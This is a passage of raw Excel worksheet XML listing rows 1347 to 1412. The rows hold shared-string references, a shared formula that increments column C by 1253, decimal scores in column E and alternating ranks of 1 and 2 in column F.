      </c>
      <c r="F1347">
        <v>2</v>
      </c>
    </row>
    <row r="1348" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1348" t="s">
        <v>2590</v>
      </c>
      <c r="B1348" t="s">
        <v>2591</v>
      </c>
      <c r="C1348">
        <f t="shared" si="20"/>
        <v>11117979</v>
      </c>
      <c r="D1348" t="s">
        <v>286</v>
      </c>
      <c r="E1348">
        <v>26.116861343383789</v>
      </c>
      <c r="F1348">
        <v>1</v>
      </c>
    </row>
    <row r="1349" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1349" t="s">
        <v>2590</v>
      </c>
      <c r="B1349" t="s">
        <v>2591</v>
      </c>
      <c r="C1349">
        <f t="shared" si="20"/>
        <v>11119232</v>
      </c>
      <c r="D1349" t="s">
        <v>2592</v>
      </c>
      <c r="E1349">
        <v>6.2996292114257813</v>
      </c>
      <c r="F1349">
        <v>2</v>
      </c>
    </row>
    <row r="1350" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1350" t="s">
        <v>2593</v>
      </c>
      <c r="B1350" t="s">
        <v>2594</v>
      </c>
      <c r="C1350">
        <f t="shared" si="20"/>
        <v>11120485</v>
      </c>
      <c r="D1350" t="s">
        <v>2595</v>
      </c>
      <c r="E1350">
        <v>27.188394546508789</v>
      </c>
      <c r="F1350">
        <v>1</v>
      </c>
    </row>
    <row r="1351" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1351" t="s">
        <v>2593</v>
      </c>
      <c r="B1351" t="s">
        <v>2594</v>
      </c>
      <c r="C1351">
        <f t="shared" si="20"/>
        <v>11121738</v>
      </c>
      <c r="D1351" t="s">
        <v>2596</v>
      </c>
      <c r="E1351">
        <v>1.9291663193143899E-4</v>
      </c>
      <c r="F1351">
        <v>2</v>
      </c>
    </row>
    <row r="1352" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1352" t="s">
        <v>2597</v>
      </c>
      <c r="B1352" t="s">
        <v>2598</v>
      </c>
      <c r="C1352">
        <f t="shared" si="20"/>
        <v>11122991</v>
      </c>
      <c r="D1352" t="s">
        <v>2599</v>
      </c>
      <c r="E1352">
        <v>25.304862976074219</v>
      </c>
      <c r="F1352">
        <v>1</v>
      </c>
    </row>
    <row r="1353" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1353" t="s">
        <v>2597</v>
      </c>
      <c r="B1353" t="s">
        <v>2598</v>
      </c>
      <c r="C1353">
        <f t="shared" si="20"/>
        <v>11124244</v>
      </c>
      <c r="D1353" t="s">
        <v>2600</v>
      </c>
      <c r="E1353">
        <v>6.6414520144462585E-2</v>
      </c>
      <c r="F1353">
        <v>2</v>
      </c>
    </row>
    <row r="1354" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1354" t="s">
        <v>2601</v>
      </c>
      <c r="B1354" t="s">
        <v>2602</v>
      </c>
      <c r="C1354">
        <f t="shared" ref="C1354:C1417" si="21">C1353+1253</f>
        <v>11125497</v>
      </c>
      <c r="D1354" t="s">
        <v>2603</v>
      </c>
      <c r="E1354">
        <v>29.79124641418457</v>
      </c>
      <c r="F1354">
        <v>1</v>
      </c>
    </row>
    <row r="1355" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1355" t="s">
        <v>2601</v>
      </c>
      <c r="B1355" t="s">
        <v>2602</v>
      </c>
      <c r="C1355">
        <f t="shared" si="21"/>
        <v>11126750</v>
      </c>
      <c r="D1355" t="s">
        <v>2604</v>
      </c>
      <c r="E1355">
        <v>3.5638968256535009E-5</v>
      </c>
      <c r="F1355">
        <v>2</v>
      </c>
    </row>
    <row r="1356" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1356" t="s">
        <v>2605</v>
      </c>
      <c r="B1356" t="s">
        <v>2606</v>
      </c>
      <c r="C1356">
        <f t="shared" si="21"/>
        <v>11128003</v>
      </c>
      <c r="D1356" t="s">
        <v>2607</v>
      </c>
      <c r="E1356">
        <v>17.706705093383789</v>
      </c>
      <c r="F1356">
        <v>1</v>
      </c>
    </row>
    <row r="1357" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1357" t="s">
        <v>2605</v>
      </c>
      <c r="B1357" t="s">
        <v>2606</v>
      </c>
      <c r="C1357">
        <f t="shared" si="21"/>
        <v>11129256</v>
      </c>
      <c r="D1357" t="s">
        <v>2608</v>
      </c>
      <c r="E1357">
        <v>0.39638185501098627</v>
      </c>
      <c r="F1357">
        <v>2</v>
      </c>
    </row>
    <row r="1358" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1358" t="s">
        <v>2609</v>
      </c>
      <c r="B1358" t="s">
        <v>2610</v>
      </c>
      <c r="C1358">
        <f t="shared" si="21"/>
        <v>11130509</v>
      </c>
      <c r="D1358" t="s">
        <v>2611</v>
      </c>
      <c r="E1358">
        <v>31.7365608215332</v>
      </c>
      <c r="F1358">
        <v>1</v>
      </c>
    </row>
    <row r="1359" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1359" t="s">
        <v>2609</v>
      </c>
      <c r="B1359" t="s">
        <v>2610</v>
      </c>
      <c r="C1359">
        <f t="shared" si="21"/>
        <v>11131762</v>
      </c>
      <c r="D1359" t="s">
        <v>2612</v>
      </c>
      <c r="E1359">
        <v>3.5218925476074219</v>
      </c>
      <c r="F1359">
        <v>2</v>
      </c>
    </row>
    <row r="1360" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1360" t="s">
        <v>2613</v>
      </c>
      <c r="B1360" t="s">
        <v>2614</v>
      </c>
      <c r="C1360">
        <f t="shared" si="21"/>
        <v>11133015</v>
      </c>
      <c r="D1360" t="s">
        <v>2615</v>
      </c>
      <c r="E1360">
        <v>27.218124389648441</v>
      </c>
      <c r="F1360">
        <v>1</v>
      </c>
    </row>
    <row r="1361" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1361" t="s">
        <v>2613</v>
      </c>
      <c r="B1361" t="s">
        <v>2614</v>
      </c>
      <c r="C1361">
        <f t="shared" si="21"/>
        <v>11134268</v>
      </c>
      <c r="D1361" t="s">
        <v>2616</v>
      </c>
      <c r="E1361">
        <v>17.608945846557621</v>
      </c>
      <c r="F1361">
        <v>2</v>
      </c>
    </row>
    <row r="1362" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1362" t="s">
        <v>2617</v>
      </c>
      <c r="B1362" t="s">
        <v>2618</v>
      </c>
      <c r="C1362">
        <f t="shared" si="21"/>
        <v>11135521</v>
      </c>
      <c r="D1362" t="s">
        <v>2619</v>
      </c>
      <c r="E1362">
        <v>23.321599960327148</v>
      </c>
      <c r="F1362">
        <v>1</v>
      </c>
    </row>
    <row r="1363" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1363" t="s">
        <v>2617</v>
      </c>
      <c r="B1363" t="s">
        <v>2618</v>
      </c>
      <c r="C1363">
        <f t="shared" si="21"/>
        <v>11136774</v>
      </c>
      <c r="D1363" t="s">
        <v>2620</v>
      </c>
      <c r="E1363">
        <v>3.256567001342773</v>
      </c>
      <c r="F1363">
        <v>2</v>
      </c>
    </row>
    <row r="1364" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1364" t="s">
        <v>2621</v>
      </c>
      <c r="B1364" t="s">
        <v>2622</v>
      </c>
      <c r="C1364">
        <f t="shared" si="21"/>
        <v>11138027</v>
      </c>
      <c r="D1364" t="s">
        <v>2623</v>
      </c>
      <c r="E1364">
        <v>27.722085952758789</v>
      </c>
      <c r="F1364">
        <v>1</v>
      </c>
    </row>
    <row r="1365" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1365" t="s">
        <v>2621</v>
      </c>
      <c r="B1365" t="s">
        <v>2622</v>
      </c>
      <c r="C1365">
        <f t="shared" si="21"/>
        <v>11139280</v>
      </c>
      <c r="D1365" t="s">
        <v>2624</v>
      </c>
      <c r="E1365">
        <v>13.74809551239014</v>
      </c>
      <c r="F1365">
        <v>2</v>
      </c>
    </row>
    <row r="1366" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1366" t="s">
        <v>2625</v>
      </c>
      <c r="B1366" t="s">
        <v>2626</v>
      </c>
      <c r="C1366">
        <f t="shared" si="21"/>
        <v>11140533</v>
      </c>
      <c r="D1366" t="s">
        <v>2627</v>
      </c>
      <c r="E1366">
        <v>22.818634033203121</v>
      </c>
      <c r="F1366">
        <v>1</v>
      </c>
    </row>
    <row r="1367" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1367" t="s">
        <v>2625</v>
      </c>
      <c r="B1367" t="s">
        <v>2626</v>
      </c>
      <c r="C1367">
        <f t="shared" si="21"/>
        <v>11141786</v>
      </c>
      <c r="D1367" t="s">
        <v>2628</v>
      </c>
      <c r="E1367">
        <v>6.3359166961163282E-4</v>
      </c>
      <c r="F1367">
        <v>2</v>
      </c>
    </row>
    <row r="1368" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1368" t="s">
        <v>2629</v>
      </c>
      <c r="B1368" t="s">
        <v>2630</v>
      </c>
      <c r="C1368">
        <f t="shared" si="21"/>
        <v>11143039</v>
      </c>
      <c r="D1368" t="s">
        <v>2631</v>
      </c>
      <c r="E1368">
        <v>31.94161224365234</v>
      </c>
      <c r="F1368">
        <v>1</v>
      </c>
    </row>
    <row r="1369" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1369" t="s">
        <v>2629</v>
      </c>
      <c r="B1369" t="s">
        <v>2630</v>
      </c>
      <c r="C1369">
        <f t="shared" si="21"/>
        <v>11144292</v>
      </c>
      <c r="D1369" t="s">
        <v>2632</v>
      </c>
      <c r="E1369">
        <v>5.9065113067626953</v>
      </c>
      <c r="F1369">
        <v>2</v>
      </c>
    </row>
    <row r="1370" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1370" t="s">
        <v>2633</v>
      </c>
      <c r="B1370" t="s">
        <v>2634</v>
      </c>
      <c r="C1370">
        <f t="shared" si="21"/>
        <v>11145545</v>
      </c>
      <c r="D1370" t="s">
        <v>2635</v>
      </c>
      <c r="E1370">
        <v>24.74091911315918</v>
      </c>
      <c r="F1370">
        <v>1</v>
      </c>
    </row>
    <row r="1371" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1371" t="s">
        <v>2633</v>
      </c>
      <c r="B1371" t="s">
        <v>2634</v>
      </c>
      <c r="C1371">
        <f t="shared" si="21"/>
        <v>11146798</v>
      </c>
      <c r="D1371" t="s">
        <v>2636</v>
      </c>
      <c r="E1371">
        <v>11.93630313873291</v>
      </c>
      <c r="F1371">
        <v>2</v>
      </c>
    </row>
    <row r="1372" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1372" t="s">
        <v>2637</v>
      </c>
      <c r="B1372" t="s">
        <v>2638</v>
      </c>
      <c r="C1372">
        <f t="shared" si="21"/>
        <v>11148051</v>
      </c>
      <c r="D1372" t="s">
        <v>2639</v>
      </c>
      <c r="E1372">
        <v>19.956655502319339</v>
      </c>
      <c r="F1372">
        <v>1</v>
      </c>
    </row>
    <row r="1373" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1373" t="s">
        <v>2637</v>
      </c>
      <c r="B1373" t="s">
        <v>2638</v>
      </c>
      <c r="C1373">
        <f t="shared" si="21"/>
        <v>11149304</v>
      </c>
      <c r="D1373" t="s">
        <v>2640</v>
      </c>
      <c r="E1373">
        <v>5.0544133186340332</v>
      </c>
      <c r="F1373">
        <v>2</v>
      </c>
    </row>
    <row r="1374" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1374" t="s">
        <v>2641</v>
      </c>
      <c r="B1374" t="s">
        <v>2642</v>
      </c>
      <c r="C1374">
        <f t="shared" si="21"/>
        <v>11150557</v>
      </c>
      <c r="D1374" t="s">
        <v>2643</v>
      </c>
      <c r="E1374">
        <v>30.168155670166019</v>
      </c>
      <c r="F1374">
        <v>1</v>
      </c>
    </row>
    <row r="1375" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1375" t="s">
        <v>2641</v>
      </c>
      <c r="B1375" t="s">
        <v>2642</v>
      </c>
      <c r="C1375">
        <f t="shared" si="21"/>
        <v>11151810</v>
      </c>
      <c r="D1375" t="s">
        <v>2644</v>
      </c>
      <c r="E1375">
        <v>9.1096134185791016</v>
      </c>
      <c r="F1375">
        <v>2</v>
      </c>
    </row>
    <row r="1376" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1376" t="s">
        <v>2645</v>
      </c>
      <c r="B1376" t="s">
        <v>2646</v>
      </c>
      <c r="C1376">
        <f t="shared" si="21"/>
        <v>11153063</v>
      </c>
      <c r="D1376" t="s">
        <v>2647</v>
      </c>
      <c r="E1376">
        <v>43.694664001464837</v>
      </c>
      <c r="F1376">
        <v>1</v>
      </c>
    </row>
    <row r="1377" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1377" t="s">
        <v>2645</v>
      </c>
      <c r="B1377" t="s">
        <v>2646</v>
      </c>
      <c r="C1377">
        <f t="shared" si="21"/>
        <v>11154316</v>
      </c>
      <c r="D1377" t="s">
        <v>2648</v>
      </c>
      <c r="E1377">
        <v>16.162422180175781</v>
      </c>
      <c r="F1377">
        <v>2</v>
      </c>
    </row>
    <row r="1378" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1378" t="s">
        <v>2649</v>
      </c>
      <c r="B1378" t="s">
        <v>2650</v>
      </c>
      <c r="C1378">
        <f t="shared" si="21"/>
        <v>11155569</v>
      </c>
      <c r="D1378" t="s">
        <v>2651</v>
      </c>
      <c r="E1378">
        <v>19.19334602355957</v>
      </c>
      <c r="F1378">
        <v>1</v>
      </c>
    </row>
    <row r="1379" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1379" t="s">
        <v>2649</v>
      </c>
      <c r="B1379" t="s">
        <v>2650</v>
      </c>
      <c r="C1379">
        <f t="shared" si="21"/>
        <v>11156822</v>
      </c>
      <c r="D1379" t="s">
        <v>2652</v>
      </c>
      <c r="E1379">
        <v>15.243656158447269</v>
      </c>
      <c r="F1379">
        <v>2</v>
      </c>
    </row>
    <row r="1380" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1380" t="s">
        <v>2653</v>
      </c>
      <c r="B1380" t="s">
        <v>2654</v>
      </c>
      <c r="C1380">
        <f t="shared" si="21"/>
        <v>11158075</v>
      </c>
      <c r="D1380" t="s">
        <v>2655</v>
      </c>
      <c r="E1380">
        <v>31.878314971923832</v>
      </c>
      <c r="F1380">
        <v>1</v>
      </c>
    </row>
    <row r="1381" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1381" t="s">
        <v>2653</v>
      </c>
      <c r="B1381" t="s">
        <v>2654</v>
      </c>
      <c r="C1381">
        <f t="shared" si="21"/>
        <v>11159328</v>
      </c>
      <c r="D1381" t="s">
        <v>2656</v>
      </c>
      <c r="E1381">
        <v>8.085540771484375</v>
      </c>
      <c r="F1381">
        <v>2</v>
      </c>
    </row>
    <row r="1382" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1382" t="s">
        <v>2657</v>
      </c>
      <c r="B1382" t="s">
        <v>2658</v>
      </c>
      <c r="C1382">
        <f t="shared" si="21"/>
        <v>11160581</v>
      </c>
      <c r="D1382" t="s">
        <v>1071</v>
      </c>
      <c r="E1382">
        <v>30.411151885986332</v>
      </c>
      <c r="F1382">
        <v>1</v>
      </c>
    </row>
    <row r="1383" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1383" t="s">
        <v>2657</v>
      </c>
      <c r="B1383" t="s">
        <v>2658</v>
      </c>
      <c r="C1383">
        <f t="shared" si="21"/>
        <v>11161834</v>
      </c>
      <c r="D1383" t="s">
        <v>2659</v>
      </c>
      <c r="E1383">
        <v>10.56982517242432</v>
      </c>
      <c r="F1383">
        <v>2</v>
      </c>
    </row>
    <row r="1384" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1384" t="s">
        <v>2660</v>
      </c>
      <c r="B1384" t="s">
        <v>2661</v>
      </c>
      <c r="C1384">
        <f t="shared" si="21"/>
        <v>11163087</v>
      </c>
      <c r="D1384" t="s">
        <v>2662</v>
      </c>
      <c r="E1384">
        <v>23.774482727050781</v>
      </c>
      <c r="F1384">
        <v>1</v>
      </c>
    </row>
    <row r="1385" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1385" t="s">
        <v>2660</v>
      </c>
      <c r="B1385" t="s">
        <v>2661</v>
      </c>
      <c r="C1385">
        <f t="shared" si="21"/>
        <v>11164340</v>
      </c>
      <c r="D1385" t="s">
        <v>2663</v>
      </c>
      <c r="E1385">
        <v>10.92530345916748</v>
      </c>
      <c r="F1385">
        <v>2</v>
      </c>
    </row>
    <row r="1386" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1386" t="s">
        <v>2664</v>
      </c>
      <c r="B1386" t="s">
        <v>2665</v>
      </c>
      <c r="C1386">
        <f t="shared" si="21"/>
        <v>11165593</v>
      </c>
      <c r="D1386" t="s">
        <v>2666</v>
      </c>
      <c r="E1386">
        <v>28.5285530090332</v>
      </c>
      <c r="F1386">
        <v>1</v>
      </c>
    </row>
    <row r="1387" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1387" t="s">
        <v>2664</v>
      </c>
      <c r="B1387" t="s">
        <v>2665</v>
      </c>
      <c r="C1387">
        <f t="shared" si="21"/>
        <v>11166846</v>
      </c>
      <c r="D1387" t="s">
        <v>2667</v>
      </c>
      <c r="E1387">
        <v>2.26094743993599E-5</v>
      </c>
      <c r="F1387">
        <v>2</v>
      </c>
    </row>
    <row r="1388" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1388" t="s">
        <v>2668</v>
      </c>
      <c r="B1388" t="s">
        <v>2669</v>
      </c>
      <c r="C1388">
        <f t="shared" si="21"/>
        <v>11168099</v>
      </c>
      <c r="D1388" t="s">
        <v>2670</v>
      </c>
      <c r="E1388">
        <v>35.062301635742188</v>
      </c>
      <c r="F1388">
        <v>1</v>
      </c>
    </row>
    <row r="1389" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1389" t="s">
        <v>2668</v>
      </c>
      <c r="B1389" t="s">
        <v>2669</v>
      </c>
      <c r="C1389">
        <f t="shared" si="21"/>
        <v>11169352</v>
      </c>
      <c r="D1389" t="s">
        <v>2671</v>
      </c>
      <c r="E1389">
        <v>12.140693664550779</v>
      </c>
      <c r="F1389">
        <v>2</v>
      </c>
    </row>
    <row r="1390" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1390" t="s">
        <v>2672</v>
      </c>
      <c r="B1390" t="s">
        <v>2673</v>
      </c>
      <c r="C1390">
        <f t="shared" si="21"/>
        <v>11170605</v>
      </c>
      <c r="D1390" t="s">
        <v>2674</v>
      </c>
      <c r="E1390">
        <v>26.188369750976559</v>
      </c>
      <c r="F1390">
        <v>1</v>
      </c>
    </row>
    <row r="1391" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1391" t="s">
        <v>2672</v>
      </c>
      <c r="B1391" t="s">
        <v>2673</v>
      </c>
      <c r="C1391">
        <f t="shared" si="21"/>
        <v>11171858</v>
      </c>
      <c r="D1391" t="s">
        <v>2675</v>
      </c>
      <c r="E1391">
        <v>6.5887868404388428E-2</v>
      </c>
      <c r="F1391">
        <v>2</v>
      </c>
    </row>
    <row r="1392" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1392" t="s">
        <v>2676</v>
      </c>
      <c r="B1392" t="s">
        <v>2677</v>
      </c>
      <c r="C1392">
        <f t="shared" si="21"/>
        <v>11173111</v>
      </c>
      <c r="D1392" t="s">
        <v>2678</v>
      </c>
      <c r="E1392">
        <v>21.568916320800781</v>
      </c>
      <c r="F1392">
        <v>1</v>
      </c>
    </row>
    <row r="1393" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1393" t="s">
        <v>2676</v>
      </c>
      <c r="B1393" t="s">
        <v>2677</v>
      </c>
      <c r="C1393">
        <f t="shared" si="21"/>
        <v>11174364</v>
      </c>
      <c r="D1393" t="s">
        <v>2679</v>
      </c>
      <c r="E1393">
        <v>2.797301292419434</v>
      </c>
      <c r="F1393">
        <v>2</v>
      </c>
    </row>
    <row r="1394" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1394" t="s">
        <v>2680</v>
      </c>
      <c r="B1394" t="s">
        <v>2681</v>
      </c>
      <c r="C1394">
        <f t="shared" si="21"/>
        <v>11175617</v>
      </c>
      <c r="D1394" t="s">
        <v>2293</v>
      </c>
      <c r="E1394">
        <v>31.129262924194339</v>
      </c>
      <c r="F1394">
        <v>1</v>
      </c>
    </row>
    <row r="1395" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1395" t="s">
        <v>2680</v>
      </c>
      <c r="B1395" t="s">
        <v>2681</v>
      </c>
      <c r="C1395">
        <f t="shared" si="21"/>
        <v>11176870</v>
      </c>
      <c r="D1395" t="s">
        <v>2682</v>
      </c>
      <c r="E1395">
        <v>0.1238751783967018</v>
      </c>
      <c r="F1395">
        <v>2</v>
      </c>
    </row>
    <row r="1396" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1396" t="s">
        <v>2683</v>
      </c>
      <c r="B1396" t="s">
        <v>2684</v>
      </c>
      <c r="C1396">
        <f t="shared" si="21"/>
        <v>11178123</v>
      </c>
      <c r="D1396" t="s">
        <v>2685</v>
      </c>
      <c r="E1396">
        <v>22.283346176147461</v>
      </c>
      <c r="F1396">
        <v>1</v>
      </c>
    </row>
    <row r="1397" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1397" t="s">
        <v>2683</v>
      </c>
      <c r="B1397" t="s">
        <v>2684</v>
      </c>
      <c r="C1397">
        <f t="shared" si="21"/>
        <v>11179376</v>
      </c>
      <c r="D1397" t="s">
        <v>2686</v>
      </c>
      <c r="E1397">
        <v>0.58505594730377197</v>
      </c>
      <c r="F1397">
        <v>2</v>
      </c>
    </row>
    <row r="1398" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1398" t="s">
        <v>2687</v>
      </c>
      <c r="B1398" t="s">
        <v>2688</v>
      </c>
      <c r="C1398">
        <f t="shared" si="21"/>
        <v>11180629</v>
      </c>
      <c r="D1398" t="s">
        <v>2689</v>
      </c>
      <c r="E1398">
        <v>19.224533081054691</v>
      </c>
      <c r="F1398">
        <v>1</v>
      </c>
    </row>
    <row r="1399" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1399" t="s">
        <v>2687</v>
      </c>
      <c r="B1399" t="s">
        <v>2688</v>
      </c>
      <c r="C1399">
        <f t="shared" si="21"/>
        <v>11181882</v>
      </c>
      <c r="D1399" t="s">
        <v>2690</v>
      </c>
      <c r="E1399">
        <v>7.6891508102416992</v>
      </c>
      <c r="F1399">
        <v>2</v>
      </c>
    </row>
    <row r="1400" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1400" t="s">
        <v>2691</v>
      </c>
      <c r="B1400" t="s">
        <v>2692</v>
      </c>
      <c r="C1400">
        <f t="shared" si="21"/>
        <v>11183135</v>
      </c>
      <c r="D1400" t="s">
        <v>2693</v>
      </c>
      <c r="E1400">
        <v>33.709815979003913</v>
      </c>
      <c r="F1400">
        <v>1</v>
      </c>
    </row>
    <row r="1401" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1401" t="s">
        <v>2691</v>
      </c>
      <c r="B1401" t="s">
        <v>2692</v>
      </c>
      <c r="C1401">
        <f t="shared" si="21"/>
        <v>11184388</v>
      </c>
      <c r="D1401" t="s">
        <v>2694</v>
      </c>
      <c r="E1401">
        <v>8.4979124069213867</v>
      </c>
      <c r="F1401">
        <v>2</v>
      </c>
    </row>
    <row r="1402" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1402" t="s">
        <v>2695</v>
      </c>
      <c r="B1402" t="s">
        <v>2696</v>
      </c>
      <c r="C1402">
        <f t="shared" si="21"/>
        <v>11185641</v>
      </c>
      <c r="D1402" t="s">
        <v>2697</v>
      </c>
      <c r="E1402">
        <v>21.148557662963871</v>
      </c>
      <c r="F1402">
        <v>1</v>
      </c>
    </row>
    <row r="1403" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1403" t="s">
        <v>2695</v>
      </c>
      <c r="B1403" t="s">
        <v>2696</v>
      </c>
      <c r="C1403">
        <f t="shared" si="21"/>
        <v>11186894</v>
      </c>
      <c r="D1403" t="s">
        <v>2698</v>
      </c>
      <c r="E1403">
        <v>7.3788337707519531</v>
      </c>
      <c r="F1403">
        <v>2</v>
      </c>
    </row>
    <row r="1404" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1404" t="s">
        <v>2699</v>
      </c>
      <c r="B1404" t="s">
        <v>2700</v>
      </c>
      <c r="C1404">
        <f t="shared" si="21"/>
        <v>11188147</v>
      </c>
      <c r="D1404" t="s">
        <v>2701</v>
      </c>
      <c r="E1404">
        <v>15.09340286254883</v>
      </c>
      <c r="F1404">
        <v>1</v>
      </c>
    </row>
    <row r="1405" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1405" t="s">
        <v>2699</v>
      </c>
      <c r="B1405" t="s">
        <v>2700</v>
      </c>
      <c r="C1405">
        <f t="shared" si="21"/>
        <v>11189400</v>
      </c>
      <c r="D1405" t="s">
        <v>2702</v>
      </c>
      <c r="E1405">
        <v>14.21878623962402</v>
      </c>
      <c r="F1405">
        <v>2</v>
      </c>
    </row>
    <row r="1406" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1406" t="s">
        <v>2703</v>
      </c>
      <c r="B1406" t="s">
        <v>2704</v>
      </c>
      <c r="C1406">
        <f t="shared" si="21"/>
        <v>11190653</v>
      </c>
      <c r="D1406" t="s">
        <v>2705</v>
      </c>
      <c r="E1406">
        <v>28.191572189331051</v>
      </c>
      <c r="F1406">
        <v>1</v>
      </c>
    </row>
    <row r="1407" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1407" t="s">
        <v>2703</v>
      </c>
      <c r="B1407" t="s">
        <v>2704</v>
      </c>
      <c r="C1407">
        <f t="shared" si="21"/>
        <v>11191906</v>
      </c>
      <c r="D1407" t="s">
        <v>2706</v>
      </c>
      <c r="E1407">
        <v>5.3433918952941886</v>
      </c>
      <c r="F1407">
        <v>2</v>
      </c>
    </row>
    <row r="1408" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1408" t="s">
        <v>2707</v>
      </c>
      <c r="B1408" t="s">
        <v>2708</v>
      </c>
      <c r="C1408">
        <f t="shared" si="21"/>
        <v>11193159</v>
      </c>
      <c r="D1408" t="s">
        <v>2709</v>
      </c>
      <c r="E1408">
        <v>22.687679290771481</v>
      </c>
      <c r="F1408">
        <v>1</v>
      </c>
    </row>
    <row r="1409" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1409" t="s">
        <v>2707</v>
      </c>
      <c r="B1409" t="s">
        <v>2708</v>
      </c>
      <c r="C1409">
        <f t="shared" si="21"/>
        <v>11194412</v>
      </c>
      <c r="D1409" t="s">
        <v>2710</v>
      </c>
      <c r="E1409">
        <v>1.619353055953979</v>
      </c>
      <c r="F1409">
        <v>2</v>
      </c>
    </row>
    <row r="1410" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1410" t="s">
        <v>2711</v>
      </c>
      <c r="B1410" t="s">
        <v>2712</v>
      </c>
      <c r="C1410">
        <f t="shared" si="21"/>
        <v>11195665</v>
      </c>
      <c r="D1410" t="s">
        <v>2713</v>
      </c>
      <c r="E1410">
        <v>27.59352874755859</v>
      </c>
      <c r="F1410">
        <v>1</v>
      </c>
    </row>
    <row r="1411" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1411" t="s">
        <v>2711</v>
      </c>
      <c r="B1411" t="s">
        <v>2712</v>
      </c>
      <c r="C1411">
        <f t="shared" si="21"/>
        <v>11196918</v>
      </c>
      <c r="D1411" t="s">
        <v>2714</v>
      </c>
      <c r="E1411">
        <v>4.1456289291381836</v>
      </c>
      <c r="F1411">
        <v>2</v>
      </c>
    </row>
    <row r="1412" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1412" t="s">
        <v>2715</v>
      </c>
      <c r="B1412" t="s">
        <v>2716</v>
      </c>
      <c r="C1412">
        <f t="shared" si="21"/>
        <v>11198171</v>
      </c>
      <c r="D1412" t="s">
        <v>2717</v>
      </c>
      <c r="E1412">
